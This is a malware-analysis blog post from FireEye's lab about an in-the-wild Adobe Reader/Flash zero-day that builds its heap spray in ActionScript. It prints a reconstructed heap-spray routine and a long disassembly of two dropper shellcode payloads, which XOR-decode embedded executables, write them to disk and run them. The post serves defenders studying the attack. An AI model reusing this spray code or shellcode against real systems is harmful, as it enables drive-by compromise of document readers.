Malware Intelligence Lab from FireEye - Research & Analysis of Zero-Day & Advanced Targeted Threats:Heap Spraying with Actionscript

Why turning off Javascript won't help this time

Introduction

As you may have heard, there's a new Adobe PDF-or-Flash-or-something 0-day in the wild. So this is a quick note about how it's implemented, but this blog post is not going to cover any details about the exploit itself.

Background Summary

Most of the Acrobat exploits over the last several months use the, now common, heap spraying technique, implemented in Javascript/ECMAscript, a Turing complete language that Adobe thought would go well with static documents. (Cause that went so well for Postscript) (Ironically, PDF has now come full circle back to having the features of Postscript that it was trying to get away from.) The exploit could be made far far less reliable, by disabling Javascript in your Adobe Acrobat Reader.

But apparently there's no easy way to disable Flash through the UI. US-CERT recommends renaming the %ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll and %ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll files. [Edit: Actually the source for this advice is the Adobe Product Security Incident Response Team (PSIRT).]

Anyway, here's why… Flash has it's own version of ECMAScript called Actionscript, and whoever wrote this new 0-day, finally did something new by implementing the heap-spray routine with Actionscript inside of Flash.

Details

Actionscript is tokenized/compiled into an instruction set for an Actionscript Virtual Machine [AVM¹] and it retains much of the same shape in bytecode form, as the original Actionscript source. This makes it fairly easy to de-compile the byte code back into something easier to read. For example: [Original flash filename replaced with xxxxx here]


     constructor * <q>[public]xxxxx_fla::MainTimeline=()(0 params, 0 optional)
     [stack:3 locals:1 scope:10-11 flags:]
     {
         00000) + 0:0 getlocal_0
         00001) + 1:0 pushscope
         00002) + 0:1 getlocal_0
         00003) + 1:1 constructsuper 0 params
         00004) + 0:1 findpropstrict <q>[public]::addFrameScript
         00005) + 1:1 pushbyte 0
         00006) + 2:1 getlex <q>[packageinternal]xxxxx_fla::frame1
         00007) + 3:1 callpropvoid <q>[public]::addFrameScript, 2 params
         00008) + 0:1 returnvoid
     }

This may be incorrect, because I'm using only the fantastic power of my own brain to decompile this, but this is approximately what it says in English, er I mean Actionscript:

var whatever:MovieClip = new MovieClip();
     whatever:addframeScript(0, frame1);

And then frame1 [see Appendix] is vaguely like this:

function frame1():void {
    var a:String = "\13\13\13\13";
    var b:String = "\0c\0c\0c\0c"; // A heap address, and effectively x86 NOPs
    while ( b.length < 0x1000000 ) {
       b = b + a;
    }
    // This brings us to instruction line 18 (see below)
    var byteArr:ByteArray = new ByteArray(); // lines 19 thru 22
    byteArr.writeByte(0x40); // lines 23 thru 34
    byteArr.writeByte(0x40);
    byteArr.writeByte(0x40);
    byteArr.writeByte(0x40);
    // lines 36 thru 46     
    while (byteArr.length < 64 * 0x100000) {
       byteArr.writeMultiByte(b, "iso-8859-1");
    }
    // line 47 onwards
    byteArr.writeByte(0x90); // NOP
    byteArr.writeByte(0x90); // NOP
    byteArr.writeByte(0x90); // NOP
    byteArr.writeByte(0x90); // NOP
    byteArr.writeByte(0x81); // 81EC 20010000 → SUB ESP,0x120
    byteArr.writeByte(0xEC);
    byteArr.writeByte(0x20);
    byteArr.writeByte(0x01);
    byteArr.writeByte(0x00);
    byteArr.writeByte(0x00);
    // etc. etc. etc. building up the shellcode one byte at a time
}

Appendix

This is the output from the excellent SWFTools.


     slot 0: var <q>[public]::a:NULL
     slot 0: var <q>[public]::byteArr:<q>[public]flash.utils::ByteArray
     slot 0: var <q>[public]::b:NULL
      method * <q>[packageinternal]xxxxx_fla::frame1=()(0 params, 0 optional)
     [stack:3 locals:1 scope:10-11 flags:] slot:0
     {
         00000) + 0:0 getlocal_0
         00001) + 1:0 pushscope
         00002) + 0:1 findproperty <q>[public]::b
         00003) + 1:1 pushstring "\0c\0c\0c\0c"
         00004) + 2:1 initproperty <q>[public]::b
         00005) + 0:1 findproperty <q>[public]::a
         00006) + 1:1 pushstring "\13\13\13\13"
         00007) + 2:1 initproperty <q>[public]::a
         00008) + 0:1 jump ->15
         00009) + 0:1 label
         00010) + 0:1 findproperty <q>[public]::b
         00011) + 1:1 getlex <q>[public]::b
         00012) + 2:1 getlex <q>[public]::a
         00013) + 3:1 add
         00014) + 2:1 initproperty <q>[public]::b
         00015) + 0:1 getlex <q>[public]::b
         00016) + 1:1 getproperty <multi>{
                      [private]NULL,[public]"",
                      [private]NULL,[public]xxxxx_fla,
                      [packageinternal]xxxxx_fla,
                      [namespace]http://adobe.com/AS3/2006/builtin,
                      [public]adobe.utils,
                      [public]flash.accessibility,
                      [public]flash.display,
                      [public]flash.errors,
                      [public]flash.events,
                      [public]flash.external,
                      [public]flash.filters,
                      [public]flash.geom,
                      [public]flash.media,
                      [public]flash.net,
                      [public]flash.printing,
                      [public]flash.system,
                      [public]flash.text,
                      [public]flash.ui,
                      [public]flash.utils,
                      [public]flash.xml,
                      [protected]xxxxx_fla:MainTimeline,
                      [staticprotected]xxxxx_fla:MainTimeline,
                      [staticprotected]flash.display:MovieClip,
                      [staticprotected]flash.display:Sprite,
                      [staticprotected]flash.display:DisplayObjectContainer,
                      [staticprotected]flash.display:InteractiveObject,
                      [staticprotected]flash.display:DisplayObject,
                      [staticprotected]flash.events:EventDispatcher,
                      [staticprotected]Object
                      }::length
         00017) + 1:1 pushint 1048576
         00018) + 2:1 iflt ->9
         00019) + 0:1 findproperty <q>[public]::byteArr
         00020) + 1:1 findpropstrict <q>[public]flash.utils::ByteArray
         00021) + 2:1 constructprop <q>[public]flash.utils::ByteArray, 0 params
         00022) + 2:1 initproperty <q>[public]::byteArr
         00023) + 0:1 getlex <q>[public]::byteArr
         00024) + 1:1 pushbyte 64
         00025) + 2:1 callpropvoid <q>[public]::writeByte, 1 params
         00026) + 0:1 getlex <q>[public]::byteArr
         00027) + 1:1 pushbyte 64
         00028) + 2:1 callpropvoid <q>[public]::writeByte, 1 params
         00029) + 0:1 getlex <q>[public]::byteArr
         00030) + 1:1 pushbyte 64
         00031) + 2:1 callpropvoid <q>[public]::writeByte, 1 params
         00032) + 0:1 getlex <q>[public]::byteArr
         00033) + 1:1 pushbyte 64
         00034) + 2:1 callpropvoid <q>[public]::writeByte, 1 params
         00035) + 0:1 jump ->41
         00036) + 0:1 label
         00037) + 0:1 getlex <q>[public]::byteArr
         00038) + 1:1 getlex <q>[public]::b
         00039) + 2:1 pushstring "iso-8859-1"
         00040) + 3:1 callpropvoid <q>[public]::writeMultiByte, 2 params
         00041) + 0:1 getlex <q>[public]::byteArr
         00042) + 1:1 getproperty <q>[public]::length
         00043) + 1:1 pushint 1048576
         00044) + 2:1 pushbyte 64
         00045) + 3:1 multiply
         00046) + 2:1 iflt ->36
         00047) + 0:1 getlex <q>[public]::byteArr
         00048) + 1:1 pushshort 144
         00049) + 2:1 callpropvoid <q>[public]::writeByte, 1 params
         00050) + 0:1 getlex <q>[public]::byteArr
         00051) + 1:1 pushshort 144
         00052) + 2:1 callpropvoid <q>[public]::writeByte, 1 params
         00053) + 0:1 getlex <q>[public]::byteArr
         00054) + 1:1 pushshort 144
         00055) + 2:1 callpropvoid <q>[public]::writeByte, 1 params
         00056) + 0:1 getlex <q>[public]::byteArr
         00057) + 1:1 pushshort 144
         00058) + 2:1 callpropvoid <q>[public]::writeByte, 1 params
         00059) + 0:1 getlex <q>[public]::byteArr
         00060) + 1:1 pushshort 144
         […]

And as Bojan Zdrnja at ISC points out, there are two different shellcode payloads being used. I might write something more about these tomorrow (no promises). Most of the changed lines in this diff, are just jump offsets, which are different between the two, as there was some code added/deleted between them, and I haven't normalized this yet.

90 nop
90 nop

90 nop
90 nop

90 nop
90 nop

90 nop
90 nop

90 nop
90 nop

90 nop
90 nop

81EC20010000 sub esp,0x120
81EC20010000 sub esp,0x120

8BFC mov edi,esp
8BFC mov edi,esp

83C704 add edi,byte +0x4
83C704 add edi,byte +0x4

C7073274910C mov dword [edi],0xc917432
C7073274910C mov dword [edi],0xc917432

C747048E130AAC mov dword [edi+0x4],0xac0a138e
C747048E130AAC mov dword [edi+0x4],0xac0a138e

C7470839E27D83 mov dword [edi+0x8],0x837de239
C7470839E27D83 mov dword [edi+0x8],0x837de239

C7470C8FF21861 mov dword [edi+0xc],0x6118f28f
C7470C8FF21861 mov dword [edi+0xc],0x6118f28f

C747109332E494 mov dword [edi+0x10],0x94e43293
C747109332E494 mov dword [edi+0x10],0x94e43293

C74714A932E494 mov dword [edi+0x14],0x94e432a9
C74714A932E494 mov dword [edi+0x14],0x94e432a9

C7471843BEACDB mov dword [edi+0x18],0xdbacbe43
C7471843BEACDB mov dword [edi+0x18],0xdbacbe43

C7471CB2360F13 mov dword [edi+0x1c],0x130f36b2
C7471CB2360F13 mov dword [edi+0x1c],0x130f36b2

C74720C48D1F74 mov dword [edi+0x20],0x741f8dc4
C74720C48D1F74 mov dword [edi+0x20],0x741f8dc4

C74724512FA201 mov dword [edi+0x24],0x1a22f51
C74724512FA201 mov dword [edi+0x24],0x1a22f51

C7472857660DFF mov dword [edi+0x28],0xff0d6657
C7472857660DFF mov dword [edi+0x28],0xff0d6657

C7472C9B878BE5 mov dword [edi+0x2c],0xe58b879b
C7472C9B878BE5 mov dword [edi+0x2c],0xe58b879b

C74730EDAFFFB4 mov dword [edi+0x30],0xb4ffafed
C74730EDAFFFB4 mov dword [edi+0x30],0xb4ffafed

E9D6020000 jmp dword 0x346 | E9D8020000 jmp dword 0x348

64A130000000 mov eax,[fs:0x30]
64A130000000 mov eax,[fs:0x30]

8B400C mov eax,[eax+0xc]
8B400C mov eax,[eax+0xc]

8B701C mov esi,[eax+0x1c]
8B701C mov esi,[eax+0x1c]

AD lodsd
AD lodsd

8B6808 mov ebp,[eax+0x8]
8B6808 mov ebp,[eax+0x8]

8BF7 mov esi,edi
8BF7 mov esi,edi

6A0D push byte +0xd
6A0D push byte +0xd

59 pop ecx
59 pop ecx

E877020000 call dword 0x301 | E879020000 call dword 0x303

E2F9 loop 0x85
E2F9 loop 0x85

8BEE mov ebp,esi
8BEE mov ebp,esi

8B4530 mov eax,[ebp+0x30]
8B4530 mov eax,[ebp+0x30]

894550 mov [ebp+0x50],eax
894550 mov [ebp+0x50],eax

81EC00040000 sub esp,0x400
81EC00040000 sub esp,0x400

8BF4 mov esi,esp
8BF4 mov esi,esp

83C604 add esi,byte +0x4
83C604 add esi,byte +0x4

FF552C call dword near [ebp+0x2c]
FF552C call dword near [ebp+0x2c]

8BD0 mov edx,eax
8BD0 mov edx,eax

33C0 xor eax,eax
33C0 xor eax,eax

42 inc edx
42 inc edx

803A22 cmp byte [edx],0x22
803A22 cmp byte [edx],0x22

75FA jnz 0xa6
75FA jnz 0xa6

40 inc eax
40 inc eax

83F802 cmp eax,byte +0x2
83F802 cmp eax,byte +0x2

75F4 jnz 0xa6
75F4 jnz 0xa6

42 inc edx
42 inc edx

33C0 xor eax,eax
33C0 xor eax,eax

40 inc eax
40 inc eax

803C0222 cmp byte [edx+eax],0x22
803C0222 cmp byte [edx+eax],0x22

75F9 jnz 0xb5
75F9 jnz 0xb5

C6040200 mov byte [edx+eax],0x0
C6040200 mov byte [edx+eax],0x0

6A00 push byte +0x0
6A00 push byte +0x0

6880000000 push 0x80
6880000000 push 0x80

6A03 push byte +0x3
6A03 push byte +0x3

6A00 push byte +0x0
6A00 push byte +0x0

6A03 push byte +0x3
6A03 push byte +0x3

6800000080 push 0x80000000
6800000080 push 0x80000000

52 push edx
52 push edx

FF5510 call dword near [ebp+0x10]
FF5510 call dword near [ebp+0x10]

83F800 cmp eax,byte +0x0
83F800 cmp eax,byte +0x0

0F8E19020000 jng dword 0x2f8 | 0F8E1B020000 jng dword 0x2fa

894530 mov [ebp+0x30],eax
894530 mov [ebp+0x30],eax

8BFE mov edi,esi
8BFE mov edi,esi

57 push edi
57 push edi

6800010000 push 0x100
6800010000 push 0x100

FF5508 call dword near [ebp+0x8]
FF5508 call dword near [ebp+0x8]

33C0 xor eax,eax
33C0 xor eax,eax

40 inc eax
40 inc eax

803C0700 cmp byte [edi+eax],0x0
803C0700 cmp byte [edi+eax],0x0

75F9 jnz 0xef
75F9 jnz 0xef

894560 mov [ebp+0x60],eax
894560 mov [ebp+0x60],eax

C704075C535543 mov dword [edi+eax],0x4355535c
C704075C535543 mov dword [edi+eax],0x4355535c

C7440704484F5354 mov dword [edi+eax+0x4],0x54534f48
C7440704484F5354 mov dword [edi+eax+0x4],0x54534f48

C74407082E455845 mov dword [edi+eax+0x8],0x4558452e
C74407082E455845 mov dword [edi+eax+0x8],0x4558452e

C644070C00 mov byte [edi+eax+0xc],0x0
C644070C00 mov byte [edi+eax+0xc],0x0

6A00 push byte +0x0
6A00 push byte +0x0

6A00 push byte +0x0
6A00 push byte +0x0

6A02 push byte +0x2
6A02 push byte +0x2

6A00 push byte +0x0
6A00 push byte +0x0

6A00 push byte +0x0
6A00 push byte +0x0

6800000040 push 0x40000000
6800000040 push 0x40000000

57 push edi
57 push edi

FF5510 call dword near [ebp+0x10]
FF5510 call dword near [ebp+0x10]

83F800 cmp eax,byte +0x0
83F800 cmp eax,byte +0x0

0F8EC7010000 jng dword 0x2f8 | 0F8EC9010000 jng dword 0x2fa

894534 mov [ebp+0x34],eax
894534 mov [ebp+0x34],eax

C7454000000000 mov dword [ebp+0x40],0x0
C7454000000000 mov dword [ebp+0x40],0x0

81EE00050000 sub esi,0x500
81EE00050000 sub esi,0x500

6A00 push byte +0x0
6A00 push byte +0x0

6A00 push byte +0x0
6A00 push byte +0x0

6840250000 push 0x2540 | 6800250000 push 0x2500

8B4530 mov eax,[ebp+0x30]
8B4530 mov eax,[ebp+0x30]

50 push eax
50 push eax

FF5518 call dword near [ebp+0x18]
FF5518 call dword near [ebp+0x18]

6A00 push byte +0x0
6A00 push byte +0x0

8D4540 lea eax,[ebp+0x40]
8D4540 lea eax,[ebp+0x40]

50 push eax
50 push eax

6A08 push byte +0x8 | 6A30 push byte +0x30

56 push esi
56 push esi

FF7530 push dword [ebp+0x30]
FF7530 push dword [ebp+0x30]

FF551C call dword near [ebp+0x1c]
FF551C call dword near [ebp+0x1c]

8B06 mov eax,[esi] | 89B580000000 mov [ebp+0x80],esi

→ 8B4628 mov eax,[esi+0x28]

894558 mov [ebp+0x58],eax
894558 mov [ebp+0x58],eax

8B4604 mov eax,[esi+0x4] | 8B462C mov eax,[esi+0x2c]

894554 mov [ebp+0x54],eax
894554 mov [ebp+0x54],eax

0500500000 add eax,0x5000
0500500000 add eax,0x5000

0500B00000 add eax,0xb000
0500B00000 add eax,0xb000

6A00 push byte +0x0
6A00 push byte +0x0

6A00 push byte +0x0
6A00 push byte +0x0

50 push eax
50 push eax

8B4530 mov eax,[ebp+0x30]
8B4530 mov eax,[ebp+0x30]

50 push eax
50 push eax

FF5518 call dword near [ebp+0x18]
FF5518 call dword near [ebp+0x18]

C7454000000000 mov dword [ebp+0x40],0x0
C7454000000000 mov dword [ebp+0x40],0x0

C7454400000000 mov dword [ebp+0x44],0x0
C7454400000000 mov dword [ebp+0x44],0x0

33DB xor ebx,ebx
33DB xor ebx,ebx

8B5D58 mov ebx,[ebp+0x58]
8B5D58 mov ebx,[ebp+0x58]

6A00 push byte +0x0
6A00 push byte +0x0

8D4540 lea eax,[ebp+0x40]
8D4540 lea eax,[ebp+0x40]

50 push eax
50 push eax

6800040000 push 0x400
6800040000 push 0x400

56 push esi
56 push esi

FF7530 push dword [ebp+0x30]
FF7530 push dword [ebp+0x30]

FF551C call dword near [ebp+0x1c]
FF551C call dword near [ebp+0x1c]

33C9 xor ecx,ecx
33C9 xor ecx,ecx

B900040000 mov ecx,0x400
B900040000 mov ecx,0x400

80740EFF97 xor byte [esi+ecx-0x1],0x97
80740EFF97 xor byte [esi+ecx-0x1],0x97

E2F9 loop 0x1ad | E2F9 loop 0x1b4

8BC3 mov eax,ebx
8BC3 mov eax,ebx

2D00040000 sub eax,0x400
2D00040000 sub eax,0x400

83F800 cmp eax,byte +0x0
83F800 cmp eax,byte +0x0

7F03 jg 0x1c3 | 7F03 jg 0x1ca

895D40 mov [ebp+0x40],ebx
895D40 mov [ebp+0x40],ebx

6A00 push byte +0x0
6A00 push byte +0x0

8D4544 lea eax,[ebp+0x44]
8D4544 lea eax,[ebp+0x44]

50 push eax
50 push eax

FF7540 push dword [ebp+0x40]
FF7540 push dword [ebp+0x40]

56 push esi
56 push esi

FF7534 push dword [ebp+0x34]
FF7534 push dword [ebp+0x34]

FF5520 call dword near [ebp+0x20]
FF5520 call dword near [ebp+0x20]

81EB00040000 sub ebx,0x400
81EB00040000 sub ebx,0x400

83FB00 cmp ebx,byte +0x0
83FB00 cmp ebx,byte +0x0

7FB6 jg 0x194 | 7FB6 jg 0x19b

FF7534 push dword [ebp+0x34]
FF7534 push dword [ebp+0x34]

FF5528 call dword near [ebp+0x28]
FF5528 call dword near [ebp+0x28]

6A00 push byte +0x0
6A00 push byte +0x0

57 push edi
57 push edi

FF5524 call dword near [ebp+0x24]
FF5524 call dword near [ebp+0x24]

8B4560 mov eax,[ebp+0x60]
8B4560 mov eax,[ebp+0x60]

C704075C74656D mov dword [edi+eax],0x6d65745c
C704075C74656D mov dword [edi+eax],0x6d65745c

C7440704702E6578 mov dword [edi+eax+0x4],0x78652e70
C7440704702E6578 mov dword [edi+eax+0x4],0x78652e70

C744070865000000 mov dword [edi+eax+0x8],0x65
C744070865000000 mov dword [edi+eax+0x8],0x65

6A00 push byte +0x0
6A00 push byte +0x0

6A00 push byte +0x0
6A00 push byte +0x0

6A02 push byte +0x2
6A02 push byte +0x2

6A00 push byte +0x0
6A00 push byte +0x0

6A00 push byte +0x0
6A00 push byte +0x0

6800000040 push 0x40000000
6800000040 push 0x40000000

57 push edi
57 push edi

FF5510 call dword near [ebp+0x10]
FF5510 call dword near [ebp+0x10]

83F800 cmp eax,byte +0x0
83F800 cmp eax,byte +0x0

0F8ED8000000 jng dword 0x2f8 | 0F8ED3000000 jng dword 0x2fa

894534 mov [ebp+0x34],eax
894534 mov [ebp+0x34],eax

6A00 push byte +0x0
6A00 push byte +0x0

6A00 push byte +0x0
6A00 push byte +0x0

6800500000 push 0x5000
6800500000 push 0x5000

8B4530 mov eax,[ebp+0x30]
8B4530 mov eax,[ebp+0x30]

50 push eax
50 push eax

FF5518 call dword near [ebp+0x18]
FF5518 call dword near [ebp+0x18]

C7454000000000 mov dword [ebp+0x40],0x0
C7454000000000 mov dword [ebp+0x40],0x0

C7454400000000 mov dword [ebp+0x44],0x0
C7454400000000 mov dword [ebp+0x44],0x0

33DB xor ebx,ebx
33DB xor ebx,ebx

8B5D54 mov ebx,[ebp+0x54]
8B5D54 mov ebx,[ebp+0x54]

81C300B00000 add ebx,0xb000
81C300B00000 add ebx,0xb000

6A00 push byte +0x0
6A00 push byte +0x0

8D4540 lea eax,[ebp+0x40]
8D4540 lea eax,[ebp+0x40]

50 push eax
50 push eax

6800040000 push 0x400
6800040000 push 0x400

56 push esi
56 push esi

FF7530 push dword [ebp+0x30]
FF7530 push dword [ebp+0x30]

FF551C call dword near [ebp+0x1c]
FF551C call dword near [ebp+0x1c]

33C9 xor ecx,ecx
33C9 xor ecx,ecx

B900040000 mov ecx,0x400
B900040000 mov ecx,0x400

80740EFFA0 xor byte [esi+ecx-0x1],0xa0
80740EFFA0 xor byte [esi+ecx-0x1],0xa0

E2F9 loop 0x265 | E2F9 loop 0x26c

8BC3 mov eax,ebx
8BC3 mov eax,ebx

2D00040000 sub eax,0x400
2D00040000 sub eax,0x400

83F800 cmp eax,byte +0x0
83F800 cmp eax,byte +0x0

7F03 jg 0x27b | 7F03 jg 0x282

895D40 mov [ebp+0x40],ebx
895D40 mov [ebp+0x40],ebx

6A00 push byte +0x0
6A00 push byte +0x0

8D4544 lea eax,[ebp+0x44]
8D4544 lea eax,[ebp+0x44]

50 push eax
50 push eax

FF7540 push dword [ebp+0x40]
FF7540 push dword [ebp+0x40]

56 push esi
56 push esi

FF7534 push dword [ebp+0x34]
FF7534 push dword [ebp+0x34]

FF5520 call dword near [ebp+0x20]
FF5520 call dword near [ebp+0x20]

81EB00040000 sub ebx,0x400
81EB00040000 sub ebx,0x400

83FB00 cmp ebx,byte +0x0
83FB00 cmp ebx,byte +0x0

7FB6 jg 0x24c | 7FB6 jg 0x253

→ 6A00 push byte +0x0

→ 6A00 push byte +0x0

→ 6800250000 push 0x2500

→ 8B4530 mov eax,[ebp+0x30]

→ 50 push eax

→ FF5518 call dword near [ebp+0x18]

→ 6A00 push byte +0x0

→ 8D4540 lea eax,[ebp+0x40]

→ 50 push eax

→ 6A30 push byte +0x30

→ 56 push esi

→ FF7530 push dword [ebp+0x30]

→ FF551C call dword near [ebp+0x1c]

→ 89B580000000 mov [ebp+0x80],esi

6A00 push byte +0x0
6A00 push byte +0x0

6A00 push byte +0x0
6A00 push byte +0x0

6800900000 push 0x9000
6800900000 push 0x9000

8B4534 mov eax,[ebp+0x34]
8B4534 mov eax,[ebp+0x34]

50 push eax
50 push eax

FF5518 call dword near [ebp+0x18]
FF5518 call dword near [ebp+0x18]

FF552C call dword near [ebp+0x2c] | 8B8580000000 mov eax,[ebp+0x80]

33C9 xor ecx,ecx ←

33D2 xor edx,edx ←

803C0822 cmp byte [eax+ecx],0x22 ←

7501 jnz 0x2b4 ←

42 inc edx ←

83FA03 cmp edx,byte +0x3 ←

740B jz 0x2c4 ←

81F904010000 cmp ecx,0x104 ←

7437 jz 0x2f8 ←

41 inc ecx ←

EBE9 jmp short 0x2ad ←

03C1 add eax,ecx ←

40 inc eax ←

33C9 xor ecx,ecx ←

803C0822 cmp byte [eax+ecx],0x22 ←

7403 jz 0x2d2 ←

41 inc ecx ←

EBF7 jmp short 0x2c9 ←

C6040800 mov byte [eax+ecx],0x0 ←

6A00 push byte +0x0
6A00 push byte +0x0

8D4D44 lea ecx,[ebp+0x44]
8D4D44 lea ecx,[ebp+0x44]

51 push ecx
51 push ecx

FF7540 push dword [ebp+0x40]
FF7540 push dword [ebp+0x40]

50 push eax
50 push eax

FF7534 push dword [ebp+0x34]
FF7534 push dword [ebp+0x34]

FF5520 call dword near [ebp+0x20]
FF5520 call dword near [ebp+0x20]

FF7534 push dword [ebp+0x34]
FF7534 push dword [ebp+0x34]

FF5528 call dword near [ebp+0x28]
FF5528 call dword near [ebp+0x28]

6A00 push byte +0x0
6A00 push byte +0x0

57 push edi
57 push edi

FF5524 call dword near [ebp+0x24]
FF5524 call dword near [ebp+0x24]

FF7530 push dword [ebp+0x30]
FF7530 push dword [ebp+0x30]

FF5528 call dword near [ebp+0x28]
FF5528 call dword near [ebp+0x28]

FF5504 call dword near [ebp+0x4]
FF5504 call dword near [ebp+0x4]

6A00 push byte +0x0
6A00 push byte +0x0

50 push eax
50 push eax

FF550C call dword near [ebp+0xc]
FF550C call dword near [ebp+0xc]

51 push ecx
51 push ecx

56 push esi
56 push esi

8B753C mov esi,[ebp+0x3c]
8B753C mov esi,[ebp+0x3c]

8B742E78 mov esi,[esi+ebp+0x78]
8B742E78 mov esi,[esi+ebp+0x78]

03F5 add esi,ebp
03F5 add esi,ebp

56 push esi
56 push esi

8B7620 mov esi,[esi+0x20]
8B7620 mov esi,[esi+0x20]

03F5 add esi,ebp
03F5 add esi,ebp

33C9 xor ecx,ecx
33C9 xor ecx,ecx

49 dec ecx
49 dec ecx

41 inc ecx
41 inc ecx

AD lodsd
AD lodsd

03C5 add eax,ebp
03C5 add eax,ebp

33DB xor ebx,ebx
33DB xor ebx,ebx

0FBE10 movsx edx,byte [eax]
0FBE10 movsx edx,byte [eax]

3AD6 cmp dl,dh
3AD6 cmp dl,dh

7408 jz 0x32a | 7408 jz 0x32c

C1CB07 ror ebx,0x7
C1CB07 ror ebx,0x7

03DA add ebx,edx
03DA add ebx,edx

40 inc eax
40 inc eax

EBF1 jmp short 0x31b | EBF1 jmp short 0x31d

3B1F cmp ebx,[edi]
3B1F cmp ebx,[edi]

75E7 jnz 0x315 | 75E7 jnz 0x317

5E pop esi
5E pop esi

8B5E24 mov ebx,[esi+0x24]
8B5E24 mov ebx,[esi+0x24]

03DD add ebx,ebp
03DD add ebx,ebp

668B0C4B mov cx,[ebx+ecx*2]
668B0C4B mov cx,[ebx+ecx*2]

8B5E1C mov ebx,[esi+0x1c]
8B5E1C mov ebx,[esi+0x1c]

03DD add ebx,ebp
03DD add ebx,ebp

8B048B mov eax,[ebx+ecx*4]
8B048B mov eax,[ebx+ecx*4]

03C5 add eax,ebp
03C5 add eax,ebp

AB stosd
AB stosd

5E pop esi
5E pop esi

59 pop ecx
59 pop ecx

C3 ret
C3 ret

E825FDFFFF call dword 0x70 | E823FDFFFF call dword 0x70

61 popad
61 popad

6B db 0x6B
6B db 0x6B

61 popad
61 popad

6B db 0x6B
6B db 0x6B

¹The only document I've found on this so far: avm2overview.pdf All other information is in source code form.

Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com

FireEye Malware

Intelligence Lab

Heap Spraying with Actionscript

Why turning off Javascript won't help this time

Introduction

Background Summary

Details

Appendix

TrackBack

Recent Comments

Search this Blog

Subscribe

90	`nop`		90	`nop`
90	`nop`		90	`nop`
90	`nop`		90	`nop`
90	`nop`		90	`nop`
90	`nop`		90	`nop`
90	`nop`		90	`nop`
81EC20010000	`sub esp,0x120`		81EC20010000	`sub esp,0x120`
8BFC	`mov edi,esp`		8BFC	`mov edi,esp`
83C704	`add edi,byte +0x4`		83C704	`add edi,byte +0x4`
C7073274910C	`mov dword [edi],0xc917432`		C7073274910C	`mov dword [edi],0xc917432`
C747048E130AAC	`mov dword [edi+0x4],0xac0a138e`		C747048E130AAC	`mov dword [edi+0x4],0xac0a138e`
C7470839E27D83	`mov dword [edi+0x8],0x837de239`		C7470839E27D83	`mov dword [edi+0x8],0x837de239`
C7470C8FF21861	`mov dword [edi+0xc],0x6118f28f`		C7470C8FF21861	`mov dword [edi+0xc],0x6118f28f`
C747109332E494	`mov dword [edi+0x10],0x94e43293`		C747109332E494	`mov dword [edi+0x10],0x94e43293`
C74714A932E494	`mov dword [edi+0x14],0x94e432a9`		C74714A932E494	`mov dword [edi+0x14],0x94e432a9`
C7471843BEACDB	`mov dword [edi+0x18],0xdbacbe43`		C7471843BEACDB	`mov dword [edi+0x18],0xdbacbe43`
C7471CB2360F13	`mov dword [edi+0x1c],0x130f36b2`		C7471CB2360F13	`mov dword [edi+0x1c],0x130f36b2`
C74720C48D1F74	`mov dword [edi+0x20],0x741f8dc4`		C74720C48D1F74	`mov dword [edi+0x20],0x741f8dc4`
C74724512FA201	`mov dword [edi+0x24],0x1a22f51`		C74724512FA201	`mov dword [edi+0x24],0x1a22f51`
C7472857660DFF	`mov dword [edi+0x28],0xff0d6657`		C7472857660DFF	`mov dword [edi+0x28],0xff0d6657`
C7472C9B878BE5	`mov dword [edi+0x2c],0xe58b879b`		C7472C9B878BE5	`mov dword [edi+0x2c],0xe58b879b`
C74730EDAFFFB4	`mov dword [edi+0x30],0xb4ffafed`		C74730EDAFFFB4	`mov dword [edi+0x30],0xb4ffafed`
E9D6020000	`jmp dword 0x346`	\|	E9D8020000	`jmp dword 0x348`
64A130000000	`mov eax,[fs:0x30]`		64A130000000	`mov eax,[fs:0x30]`
8B400C	`mov eax,[eax+0xc]`		8B400C	`mov eax,[eax+0xc]`
8B701C	`mov esi,[eax+0x1c]`		8B701C	`mov esi,[eax+0x1c]`
AD	`lodsd`		AD	`lodsd`
8B6808	`mov ebp,[eax+0x8]`		8B6808	`mov ebp,[eax+0x8]`
8BF7	`mov esi,edi`		8BF7	`mov esi,edi`
6A0D	`push byte +0xd`		6A0D	`push byte +0xd`
59	`pop ecx`		59	`pop ecx`
E877020000	`call dword 0x301`	\|	E879020000	`call dword 0x303`
E2F9	`loop 0x85`		E2F9	`loop 0x85`
8BEE	`mov ebp,esi`		8BEE	`mov ebp,esi`
8B4530	`mov eax,[ebp+0x30]`		8B4530	`mov eax,[ebp+0x30]`
894550	`mov [ebp+0x50],eax`		894550	`mov [ebp+0x50],eax`
81EC00040000	`sub esp,0x400`		81EC00040000	`sub esp,0x400`
8BF4	`mov esi,esp`		8BF4	`mov esi,esp`
83C604	`add esi,byte +0x4`		83C604	`add esi,byte +0x4`
FF552C	`call dword near [ebp+0x2c]`		FF552C	`call dword near [ebp+0x2c]`
8BD0	`mov edx,eax`		8BD0	`mov edx,eax`
33C0	`xor eax,eax`		33C0	`xor eax,eax`
42	`inc edx`		42	`inc edx`
803A22	`cmp byte [edx],0x22`		803A22	`cmp byte [edx],0x22`
75FA	`jnz 0xa6`		75FA	`jnz 0xa6`
40	`inc eax`		40	`inc eax`
83F802	`cmp eax,byte +0x2`		83F802	`cmp eax,byte +0x2`
75F4	`jnz 0xa6`		75F4	`jnz 0xa6`
42	`inc edx`		42	`inc edx`
33C0	`xor eax,eax`		33C0	`xor eax,eax`
40	`inc eax`		40	`inc eax`
803C0222	`cmp byte [edx+eax],0x22`		803C0222	`cmp byte [edx+eax],0x22`
75F9	`jnz 0xb5`		75F9	`jnz 0xb5`
C6040200	`mov byte [edx+eax],0x0`		C6040200	`mov byte [edx+eax],0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6880000000	`push 0x80`		6880000000	`push 0x80`
6A03	`push byte +0x3`		6A03	`push byte +0x3`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A03	`push byte +0x3`		6A03	`push byte +0x3`
6800000080	`push 0x80000000`		6800000080	`push 0x80000000`
52	`push edx`		52	`push edx`
FF5510	`call dword near [ebp+0x10]`		FF5510	`call dword near [ebp+0x10]`
83F800	`cmp eax,byte +0x0`		83F800	`cmp eax,byte +0x0`
0F8E19020000	`jng dword 0x2f8`	\|	0F8E1B020000	`jng dword 0x2fa`
894530	`mov [ebp+0x30],eax`		894530	`mov [ebp+0x30],eax`
8BFE	`mov edi,esi`		8BFE	`mov edi,esi`
57	`push edi`		57	`push edi`
